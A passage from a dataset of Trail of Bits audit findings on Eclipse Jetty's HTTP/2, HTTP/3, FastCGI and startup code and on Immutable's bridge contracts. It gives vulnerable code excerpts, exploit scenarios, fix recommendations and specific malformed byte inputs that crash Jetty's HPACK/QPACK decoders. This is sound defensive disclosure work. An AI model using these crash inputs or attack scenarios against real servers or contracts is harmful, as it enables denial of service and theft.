byteBuffer.put((byte)(0x00)); 87 NBitIntegerEncoder.encode(byteBuffer, 5, _value.length()); 88 byteBuffer.put(_value.getBytes()); 89 } Figure 12.1: LiteralNameEntryInstruction.java, lines 78-89 On line 87, 5 is the second parameter to NBitIntegerEncoder.encode, indicating that the number will take up 5 bits in the first encoded byte; however, the second parameter should be 7 instead. This means that when _value.length() is over 30, it will be incorrectly encoded. Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.
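For reference, the boundary at which an N-bit prefix stops encoding a value directly can be computed as follows (a hedged sketch of the prefixed-integer format described in RFC 7541, section 5.1):

// Illustrative only: an N-bit prefix directly encodes values up to 2^N - 2;
// the all-ones pattern (2^N - 1) signals that continuation bytes follow.
public class PrefixWidth {
    static int maxDirect(int n) { return (0xFF >>> (8 - n)) - 1; }

    public static void main(String[] args) {
        System.out.println(maxDirect(5)); // 30: lengths over 30 spill into continuation bytes
        System.out.println(maxDirect(7)); // 126: the width the wire format actually reserves here
    }
}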
Recommendations Short term, change the second parameter of the NBitIntegerEncoder.encode function from 5 to 7 in order to reflect that the number will take up 7 bits. Long term, write more tests to catch similar encoding/decoding problems.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "13. FileInitializer does not check for symlinks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. During this process, the FileInitializer class validates the destination path and throws an IOException exception if the destination is outside the ${jetty.base} directory. However, this validation routine does not check for symlinks: // now on copy/download paths (be safe above all else) if (destination != null && !destination.startsWith(_basehome.getBasePath())) throw new IOException(\"For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - \" + location); Figure 13.1: FileInitializer.java, lines 112-114 None of the subclasses of FileInitializer check for symlinks either. Thus, if the ${jetty.base} directory contains a symlink, a file path in a module's .ini file beginning with the symlink name will pass the validation check, and the file will be written to a subdirectory of the symlink's destination. Exploit Scenario A system's ${jetty.base} directory contains a symlink called dir, which points to /etc. The system administrator enables a Jetty module whose .ini file contains a [files] entry that downloads a remote file and writes it to the relative path dir/config.conf. The filesystem follows the symlink and writes a new configuration file to /etc/config.conf, which impacts the server's system configuration. Additionally, since the FileInitializer class uses the REPLACE_EXISTING flag, this behavior overwrites an existing system configuration file. Recommendations Short term, rewrite all path checks in FileInitializer and its subclasses to include a call to the Path.toRealPath function, which, by default, will resolve symlinks and produce the real filesystem path pointed to by the Path object. If this real path is outside ${jetty.base}, the file write operation should fail. Long term, consolidate all filesystem operations involving the ${jetty.base} or ${jetty.home} directories into a single centralized class that automatically performs symlink resolution and rejects operations that attempt to read from or write to an unauthorized directory. This class should catch and handle the IOException exception that is thrown in the event of a link loop or a large number of nested symlinks.
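The short-term fix can be sketched as follows (illustrative Java; the names are stand-ins for the surrounding FileInitializer logic, and for a file that does not exist yet the check would need to run against the parent directory's real path):

import java.io.IOException;
import java.nio.file.Path;

// Illustrative only: toRealPath() resolves symlinks (and throws on link loops), so a
// path that merely starts under ${jetty.base} but escapes through a link is rejected.
public class SymlinkSafeCheck {
    static void validateDestination(Path baseHome, Path destination) throws IOException {
        Path realBase = baseHome.toRealPath();
        Path realDest = destination.toRealPath();
        if (!realDest.startsWith(realBase))
            throw new IOException("For security reasons, refusing to write outside ${jetty.base}: " + destination);
    }
}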
", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "14. FileInitializer permits downloading files via plaintext HTTP ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. If the specified URL is a plaintext HTTP URL, Jetty does not raise an error or warn the user. Transmitting files over plaintext HTTP is intrinsically insecure and exposes sensitive data to tampering and eavesdropping in transit. Exploit Scenario A system administrator enables a Jetty module that downloads a remote file over plaintext HTTP during initialization. An attacker with a network intermediary position sniffs the traffic and infers sensitive information about the design and configuration of the Jetty system under configuration. Alternatively, the attacker actively tampers with the file during transmission from the remote server to the Jetty installation, which enables the attacker to alter the module's behavior and launch other attacks against the targeted system. Recommendations Short term, add a check to the FileInitializer class and its subclasses to prohibit downloads over plaintext HTTP. Additionally, add a validation check to the module .ini file parser to reject any configuration that includes a plaintext HTTP URL in the [files] section. Long term, consolidate all remote file downloads conducted during module configuration operations into a single centralized class that automatically rejects plaintext HTTP URLs. If current use cases require support of plaintext HTTP URLs, then at a minimum, have Jetty display a prominent warning message and prompt the user for manual confirmation before performing the unencrypted download.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "15. NullPointerException thrown by FastCGI parser on invalid frame type ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Because of a missing null check, the Jetty FastCGI client's Parser class throws a NullPointerException exception when parsing a frame with an invalid frame type field. This exception occurs because the findContentParser function returns null when it does not have a ContentParser object matching the specified frame type, and the caller never checks the findContentParser return value for null before dereferencing it.

case CONTENT:
{
    ContentParser contentParser = findContentParser(headerParser.getFrameType());
    if (headerParser.getContentLength() == 0)
    {
        padding = headerParser.getPaddingLength();
        state = State.PADDING;
        if (contentParser.noContent())
            return true;
    }
    else
    {
        ContentParser.Result result = contentParser.parse(buffer);
        // ...[snip]...
    }
    break;
}

Figure 15.1: Parser.java, lines 82-114 Exploit Scenario An attacker operates a malicious web server that supports FastCGI. A Jetty application communicates with this server by using Jetty's built-in FastCGI client. The remote server transmits a frame with an invalid frame type, causing a NullPointerException exception and a crash in the Jetty application. Recommendations Short term, add a null check to the parse function to abort the parsing process before dereferencing a null return value from findContentParser. If a null value is detected, parse should throw an appropriate exception, such as IllegalStateException, that Jetty can catch and handle safely. Long term, build out a larger suite of test cases that ensures graceful handling of malformed traffic and data.
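The guard itself is small. Below is a self-contained sketch with hypothetical stand-ins for the Parser internals named in figure 15.1; it shows the missing null check failing fast with a catchable exception instead of a NullPointerException.

// Hedged sketch, not Jetty's actual patch; names mirror figure 15.1.
public class FrameDemo {
    interface ContentParser { boolean noContent(); }

    // Stand-in for Parser.findContentParser: returns null for unknown types.
    static ContentParser findContentParser(int frameType) {
        return frameType == 1 ? () -> true : null;
    }

    static boolean parseContent(int frameType) {
        ContentParser contentParser = findContentParser(frameType);
        if (contentParser == null) // the missing null check
            throw new IllegalStateException("Invalid FastCGI frame type: " + frameType);
        return contentParser.noContent();
    }

    public static void main(String[] args) {
        System.out.println(parseContent(1)); // known type: parsed normally
        try {
            parseContent(99);                // unknown type
        } catch (IllegalStateException e) {
            System.out.println(e.getMessage()); // clean, catchable failure
        }
    }
}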
", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "16. Documentation does not specify that request contents and other user data can be exposed in debug logs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Over 100 times, the system calls LOG.debug with a parameter of the format BufferUtil.toDetailString(buffer), which outputs up to 56 bytes of the buffer into the log file. Jetty's implementations of various protocols and encodings, including GZIP, WebSocket, multipart encoding, and HTTP/2, output user data received over the network to the debug log using this type of call. An example instance from Jetty's WebSocket implementation appears in figure 16.1.

public Frame.Parsed parse(ByteBuffer buffer) throws WebSocketException
{
    try
    {
        // parse through
        while (buffer.hasRemaining())
        {
            if (LOG.isDebugEnabled())
                LOG.debug("{} Parsing {}", this, BufferUtil.toDetailString(buffer));
            // ...[snip]...
        }
        // ...[snip]...
    }
    // ...[snip]...
}

Figure 16.1: Parser.java, lines 88-96 Although the Jetty 12 Operations Guide does state that Jetty debugging logs can quickly consume massive amounts of disk space, it does not advise system administrators that the logs can contain sensitive user data, such as personally identifiable information. Thus, the possibility of raw traffic being captured from debug logs is undocumented. Exploit Scenario A Jetty system administrator turns on debug logging in a production environment. During the normal course of operation, a user sends traffic containing sensitive information, such as personally identifiable information or financial data, and this data is recorded to the debug log. An attacker who gains access to this log can then read the user data, compromising data confidentiality and the user's privacy rights. Recommendations Short term, update the Jetty Operations Guide to state that in addition to being extremely large, debug logs can contain sensitive user data and should be treated as sensitive. Long term, consider moving all debugging messages that contain buffer excerpts into a high-detail debug log that is enabled only for debug builds of the application.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "17. HttpStreamOverFCGI internally marks all requests as plaintext HTTP ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The HttpStreamOverFCGI class processes FastCGI messages in a format that can be processed by other system components that use the HttpStream interface. This class's onHeaders callback mistakenly marks each MetaData.Request object as a plaintext HTTP request, as the TODO comment shown in figure 17.1 indicates:

public void onHeaders()
{
    String pathQuery = URIUtil.addPathQuery(_path, _query);
    // TODO https?
    MetaData.Request request = new MetaData.Request(_method, HttpScheme.HTTP.asString(), hostPort, pathQuery, HttpVersion.fromString(_version), _headers, Long.MIN_VALUE);
    // ...[snip]...
}

Figure 17.1: HttpStreamOverFCGI.java, lines 108-119 In some configurations, other Jetty components could misinterpret a message received over FCGI as a plaintext HTTP message, which could cause a request to be incorrectly rejected, redirected in an infinite loop, or forwarded to another system over a plaintext HTTP channel instead of HTTPS.
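One direction a fix could take: FastCGI deployments conventionally signal TLS through request parameters such as HTTPS=on or REQUEST_SCHEME, so the callback could consult those instead of hardcoding the HTTP scheme. The helper below is a hypothetical, self-contained sketch, not Jetty's implementation.

import java.util.Map;

// Hedged sketch: derive the scheme from what the FCGI side reports.
public class FcgiSchemeSketch {
    // Stand-in for whatever HttpStreamOverFCGI can learn from the
    // connection or the FCGI params (hypothetical helper).
    static boolean isSecure(Map<String, String> fcgiParams) {
        return "on".equalsIgnoreCase(fcgiParams.get("HTTPS"))
            || "https".equalsIgnoreCase(fcgiParams.get("REQUEST_SCHEME"));
    }

    public static void main(String[] args) {
        System.out.println(isSecure(Map.of("HTTPS", "on")));            // true
        System.out.println(isSecure(Map.of("REQUEST_SCHEME", "http"))); // false
    }
}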
Exploit Scenario A Jetty instance runs an FCGI server and uses the HttpStream interface to process messages. The MetaData.Request class's getURI method is used to check the incoming request's URI. This method mistakenly returns a plaintext HTTP URL due to the bug in HttpStreamOverFCGI.java. One of the following takes place during the processing of this request: An application-level security control checks the incoming request's URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application rejects the request and refuses to process it, causing a denial of service. An application-level security control checks the incoming request's URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application attempts to redirect the user to a suitable HTTPS URL. The check fails on this redirected request as well, causing an infinite redirect loop and a denial of service. An application processing FCGI messages acts as a proxy, forwarding certain requests to a third HTTP server. It uses MetaData.Request.getURI to check the request's original URI and mistakenly sends a request over plaintext HTTP. Recommendations Short term, correct the bug in HttpStreamOverFCGI.java to generate the correct URI for the incoming request. Long term, consider streamlining the HTTP implementation to minimize the need for different classes to generate URIs from request data.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "18. Excessively permissive and non-standards-compliant error handling in HTTP/2 implementation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Jetty's HTTP/2 implementation violates RFC 9113 in that it fails to terminate a connection with an appropriate error code when the remote peer sends a frame with one of the following protocol violations: A SETTINGS frame with the ACK flag set and a nonzero payload length A PUSH_PROMISE frame in a stream with push disabled A GOAWAY frame with its stream ID not set to zero None of these situations creates an exploitable vulnerability. However, noncompliant protocol implementations can create compatibility problems and could cause vulnerabilities when deployed in combination with other misconfigured systems. Exploit Scenario A Jetty instance connects to an HTTP/2 server, or serves a connection from an HTTP/2 client, and the remote peer sends traffic that should cause Jetty to terminate the connection. Instead, Jetty keeps the connection alive, in violation of RFC 9113. If the remote peer is programmed to handle the noncompliant traffic differently than Jetty, further problems could result, as the two implementations interpret protocol messages differently. Recommendations Short term, update the HTTP/2 implementation to check for the following error conditions and terminate the connection with an error code that complies with RFC 9113 (a sketch of the first check appears after this list): A peer receives a SETTINGS frame with the ACK flag set and a payload length greater than zero. A client receives a PUSH_PROMISE frame after having sent, and received an acknowledgement for, a SETTINGS frame with SETTINGS_ENABLE_PUSH equal to zero. A peer receives a GOAWAY frame with the stream identifier field not set to zero.
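A minimal sketch of the first check, per RFC 9113, section 6.5, which requires treating a SETTINGS frame that has the ACK flag set and a nonzero length as a connection error of type FRAME_SIZE_ERROR. The names here are illustrative, not Jetty's internals.

// Hedged sketch of one missing RFC 9113 check (illustrative names).
public class SettingsAckCheck {
    static final int FLAG_ACK = 0x1;

    static void onSettingsFrame(int flags, int payloadLength) {
        // RFC 9113 section 6.5: a SETTINGS ACK must carry no payload.
        if ((flags & FLAG_ACK) != 0 && payloadLength != 0)
            throw new IllegalStateException("FRAME_SIZE_ERROR: SETTINGS ACK with payload");
    }

    public static void main(String[] args) {
        onSettingsFrame(FLAG_ACK, 0); // valid ACK
        try {
            onSettingsFrame(FLAG_ACK, 6); // protocol violation
        } catch (IllegalStateException e) {
            System.out.println(e.getMessage()); // connection should terminate
        }
    }
}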
Long term, audit Jetty's implementation of HTTP/2 and other protocols to ensure that Jetty handles errors in a standards-compliant manner and terminates connections as required by the applicable specifications. 19. XML external entities and entity expansion in Maven package metadata parser Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-19 Target: org.eclipse.jetty.start.fileinits.MavenMetadata", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "20. Use of deprecated AccessController class ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The classes listed in the Target cell above use the java.security.AccessController class, which is a deprecated class slated to be removed in a future Java release. The java.security library documentation states that the AccessController class is only useful in conjunction with the Security Manager, which is also deprecated. Thus, the use of AccessController no longer serves any beneficial purpose. The use of this deprecated class could impact Jetty's compatibility with future releases of the Java SDK. Recommendations Short term, remove all uses of the AccessController class. Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "21. QUIC server writes SSL private key to temporary plaintext file ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Jetty's QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudflare. When the server's SSL certificate is handed off to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM file:

protected void doStart() throws Exception
{
    // ...[snip]...
    char[] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray();
    String keyManagerPassword = sslContextFactory.getKeyManagerPassword();
    SSLKeyPair keyPair = new SSLKeyPair(
        sslContextFactory.getKeyStoreResource().getPath(),
        sslContextFactory.getKeyStoreType(),
        keyStorePassword,
        alias,
        keyManagerPassword == null ? keyStorePassword : keyManagerPassword.toCharArray()
    );
    File[] pemFiles = keyPair.export(new File(System.getProperty("java.io.tmpdir")));
    privateKeyFile = pemFiles[0];
    certificateChainFile = pemFiles[1];
}

Figure 21.1: QuicServerConnector.java, lines 154-179 Storing the private key in this manner exposes it to increased risk of theft. Although the QuicServerConnector class deletes the private key file upon stopping the server, this deleted file may not be immediately removed from the physical storage medium, exposing the file to potential theft by attackers who can access the raw bytes on the disk. A review of quiche suggests that the library's API may not support reading a DES-encrypted keyfile. If that is true, then remediating this issue would require updates to the underlying quiche library. Exploit Scenario An attacker gains read access to a Jetty HTTP/3 server's temporary directory while the server is running.
The attacker can retrieve the temporary keyfile and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certificate. Recommendations Short term, investigate the quiche library's API to determine whether it can readily support password-encrypted private keyfiles. If so, update Jetty to save the private key in a temporary password-protected file and to forward that password to quiche. Alternatively, if password-encrypted private keyfiles cannot be supported, have Jetty pass the unencrypted private key directly to quiche as a function argument. Either option would obviate the need to store the key in a plaintext file on the server's filesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a fix for this issue.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "22. Repeated code between HPACK and QPACK ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Classes for dealing with n-bit integers and Huffman coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases (TOB-JETTY-9), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged. Exploit Scenario A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable. Recommendations Short term, merge the two implementations of n-bit integers and Huffman coding classes. Long term, audit the Jetty codebase for other classes with very similar functionality.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions: HpackDecoder.decode(0x03) throws BufferUnderflowException. HpackDecoder.decode(0x4800) throws NumberFormatException. HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException. HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException. HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException. QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException. QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException. For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception within the catch statement would result in cleaner, more robust code.
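A hedged sketch of that refactoring: catch the low-level Java exceptions inside decode and rethrow a single library-level exception type. QpackException here is a stand-in for whatever Jetty-level exception the project settles on.

import java.nio.BufferUnderflowException;
import java.nio.ByteBuffer;

// Illustrative wrapper, not Jetty's actual code.
public class DecodeWrapper {
    static class QpackException extends Exception {
        QpackException(String msg, Throwable cause) { super(msg, cause); }
    }

    static void decode(ByteBuffer buf) throws QpackException {
        try {
            buf.get(); // real decoding would go here and may underflow, overflow, etc.
        } catch (BufferUnderflowException | IndexOutOfBoundsException
                | ArithmeticException | NumberFormatException e) {
            throw new QpackException("Malformed field section", e);
        }
    }

    public static void main(String[] args) {
        try {
            decode(ByteBuffer.allocate(0)); // underflows internally
        } catch (QpackException e) {
            System.out.println("Caught library-level exception: " + e.getMessage());
        }
    }
}

Callers can then rely on a single declared exception type instead of defensively wrapping every call site in catch (Throwable x).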
Exploit Scenario Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability. Recommendations Short term, document in the code that Java-level exceptions can be thrown. Long term, modify the decode functions so that they throw only Jetty-level exceptions.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "24. Incorrect QPACK encoding when multi-byte characters are used ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Java's string.length() function returns the number of characters in a string, which can be different from the number of bytes returned by the string.getBytes() function. However, QPACK encoding methods assume that they return the same number, which could cause incorrect encodings. In EncodableEntry.LiteralEntry, which is used to encode HTTP/3 header fields, the following method is used for encoding:

214 public void encode(ByteBuffer buffer, int base)
215 {
216     byte allowIntermediary = 0x00; // TODO: this is 0x10 bit, when should this be set?
217     String name = getName();
218     String value = getValue();
219
220     // Encode the prefix code and the name.
221     if (_huffman)
222     {
223         buffer.put((byte)(0x28 | allowIntermediary));
224         NBitIntegerEncoder.encode(buffer, 3, HuffmanEncoder.octetsNeeded(name));
225         HuffmanEncoder.encode(buffer, name);
226         buffer.put((byte)0x80);
227         NBitIntegerEncoder.encode(buffer, 7, HuffmanEncoder.octetsNeeded(value));
228         HuffmanEncoder.encode(buffer, value);
229     }
230     else
231     {
232         // TODO: What charset should we be using? (this applies to the instruction generators as well).
233         buffer.put((byte)(0x20 | allowIntermediary));
234         NBitIntegerEncoder.encode(buffer, 3, name.length());
235         buffer.put(name.getBytes());
236         buffer.put((byte)0x00);
237         NBitIntegerEncoder.encode(buffer, 7, value.length());
238         buffer.put(value.getBytes());
239     }
240 }

Figure 24.1: EncodableEntry.java, lines 214-240 Note in particular lines 232-238, which are used to encode literal (non-Huffman-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes(). Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes(). When this bytestring is decoded, the decoder will read the name length field and then read that many bytes as the name. If multibyte characters were used in the name field, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value field.
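A self-contained demonstration of the root cause; the mismatch appears as soon as a string contains any character outside the single-byte range.

import java.nio.charset.StandardCharsets;

// Minimal demo: String.length() counts UTF-16 chars, while the wire
// format needs the encoded byte count. The sketched fix is to encode
// once and reuse the byte array for both the length and the payload.
public class ByteLengthDemo {
    public static void main(String[] args) {
        String value = "naïve"; // 'ï' is 2 bytes in UTF-8
        byte[] bytes = value.getBytes(StandardCharsets.UTF_8);
        System.out.println(value.length()); // 5
        System.out.println(bytes.length);   // 6
        // The encoder should write bytes.length, then bytes -- never value.length().
    }
}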
The same issue appears in EncodableEntry.ReferencedNameEntry.encode:

164 // Encode the value.
165 String value = getValue();
166 if (_huffman)
167 {
168     buffer.put((byte)0x80);
169     NBitIntegerEncoder.encode(buffer, 7, HuffmanEncoder.octetsNeeded(value));
170     HuffmanEncoder.encode(buffer, value);
171 }
172 else
173 {
174     buffer.put((byte)0x00);
175     NBitIntegerEncoder.encode(buffer, 7, value.length());
176     buffer.put(value.getBytes());
177 }

Figure 24.2: EncodableEntry.java, lines 164-177 If value has multibyte characters, it will be incorrectly encoded on lines 174-176. Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly. Recommendations Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using string.getBytes() rather than string.length().", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "25. No limits on maximum capacity in QPACK decoder ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "In QPACK, an encoder can set the dynamic table capacity of the decoder using a Set Dynamic Table Capacity instruction. The HTTP/3 specification requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. However, nowhere in the QPACK code is this limit checked. This means that the encoder can choose whatever capacity it wants (up to Java's maximum integer value), allowing it to take up large amounts of space in the decoder's memory. Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a Set Dynamic Table Capacity instruction, setting the dynamic table capacity to Java's maximum integer value, 2^31 - 1 (2.1 GB). He then repeatedly enters very large values into the server's dynamic table using an Insert with Literal Name instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes. Recommendations Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity. Long term, audit Jetty's implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "1. Initialization functions vulnerable to front-running ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "Several implementation contracts have initialization functions that can be front-run, which would allow an attacker to incorrectly initialize the contracts.
Due to the use of the delegatecall proxy pattern, the RootERC20Predicate and RootERC20PredicateFlowRate contracts (as well as other upgradeable contracts that are not in scope) cannot be initialized with a constructor, so they have initialize functions: function initialize ( address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external virtual initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); } Figure 1.1: Front-runnable initialize function (RootERC20Predicate.sol) function initialize ( address superAdmin , address pauseAdmin , address unpauseAdmin , address rateAdmin , address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); __Pausable_init(); __FlowRateWithdrawalQueue_init(); _setupRole(DEFAULT_ADMIN_ROLE, superAdmin); _setupRole(PAUSER_ADMIN_ROLE, pauseAdmin); _setupRole(UNPAUSER_ADMIN_ROLE, unpauseAdmin); _setupRole(RATE_CONTROL_ROLE, rateAdmin); } Figure 1.2: Front-runnable initialize function (RootERC20PredicateFlowRate.sol) An attacker could front-run these functions and initialize the contracts with malicious values. The documentation provided by the Immutable team indicates that they are aware of this issue and how to mitigate it upon deployment of the proxy or when upgrading the implementation. However, there do not appear to be any deployment scripts to demonstrate that this will be correctly done in practice, and the codebase's tests do not cover upgradeability. Exploit Scenario Bob deploys the RootERC20Predicate contract. Eve deploys an upgradeable version of the ExitHelper contract and front-runs the RootERC20Predicate initialization, passing her contract's address as the exitHelper argument. Due to a lack of post-deployment checks, this issue goes unnoticed and the protocol functions as intended for some time, drawing in a large amount of deposits. Eve then upgrades the ExitHelper contract to allow her to arbitrarily call the onL2StateReceive function of the RootERC20Predicate contract, draining all assets from the bridge. Recommendations Short term, either use a factory pattern that will prevent front-running the initialization, or ensure that the deployment scripts have robust protections against front-running attacks. Long term, carefully review the Solidity documentation, especially the Warnings section, and the pitfalls of using the delegatecall proxy pattern.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "2. Lack of lower and upper bounds for system parameters ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "The lack of lower and upper bound checks when setting important system parameters could lead to a temporary denial of service, allow users to complete their withdrawals prematurely, or otherwise hinder the expected performance of the system. The setWithdrawalDelay function of the RootERC20PredicateFlowRate contract can be used by the rate control role to set the amount of time that a user needs to wait before they can withdraw their assets from the root chain of the bridge.
// RootERC20PredicateFlowRate.sol
function setWithdrawalDelay(uint256 delay) external onlyRole(RATE_CONTROL_ROLE) {
    _setWithdrawalDelay(delay);
}

// FlowRateWithdrawalQueue.sol
function _setWithdrawalDelay(uint256 delay) internal {
    withdrawalDelay = delay;
    emit WithdrawalDelayUpdated(delay);
}

Figure 2.1: The setter functions for the withdrawalDelay state variable (RootERC20PredicateFlowRate.sol and FlowRateWithdrawalQueue.sol) The withdrawalDelay variable value is applied to all currently pending withdrawals in the system, as shown in the highlighted lines of figure 2.2. function _processWithdrawal ( address receiver , uint256 index ) internal returns ( address withdrawer , address token , uint256 amount ) { // ... // Note: Add the withdrawal delay here, and not when enqueuing to allow changes // to withdrawal delay to have effect on in progress withdrawals. uint256 withdrawalTime = withdrawal.timestamp + withdrawalDelay; // slither-disable-next-line timestamp if ( block.timestamp < withdrawalTime) { // solhint-disable-next-line not-rely-on-time revert WithdrawalRequestTooEarly( block.timestamp , withdrawalTime); } // ... } Figure 2.2: The function completes a withdrawal from the withdrawal queue if the withdrawalTime has passed. (FlowRateWithdrawalQueue.sol) However, the setWithdrawalDelay function does not contain any validation on the delay input parameter. If the input parameter is set to zero, users can skip the withdrawal queue and immediately withdraw their assets. Conversely, if this variable is set to a very high value, it could prevent users from withdrawing their assets for as long as this variable is not updated. The setRateControlThreshold function allows the rate control role to set important token parameters that are used to limit the amount of tokens that can be withdrawn at once, or in a certain time period, in order to mitigate the risk of a large amount of tokens being bridged after an exploit. // RootERC20PredicateFlowRate.sol function setRateControlThreshold ( address token , uint256 capacity , uint256 refillRate , uint256 largeTransferThreshold ) external onlyRole(RATE_CONTROL_ROLE) { _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; } // FlowRateDetection.sol function _setFlowRateThreshold ( address token , uint256 capacity , uint256 refillRate ) internal { if (token == address ( 0 )) { revert InvalidToken(); } if (capacity == 0 ) { revert InvalidCapacity(); } if (refillRate == 0 ) { revert InvalidRefillRate(); } Bucket storage bucket = flowRateBuckets[token]; if (bucket.capacity == 0 ) { bucket.depth = capacity; } bucket.capacity = capacity; bucket.refillRate = refillRate; } Figure 2.3: The function sets the system parameters to limit withdrawals of a specific token. (RootERC20PredicateFlowRate.sol and FlowRateDetection.sol) However, because the _setFlowRateThreshold function of the FlowRateDetection contract is missing upper bounds on the input parameters, these values could be set to an incorrect or very high value. This could potentially allow users to withdraw large amounts of tokens at once, without triggering the withdrawal queue. Exploit Scenario Alice attempts to update the withdrawalDelay state variable from 24 to 48 hours. However, she mistakenly sets the variable to 0. Eve uses this setting to skip the withdrawal queue and 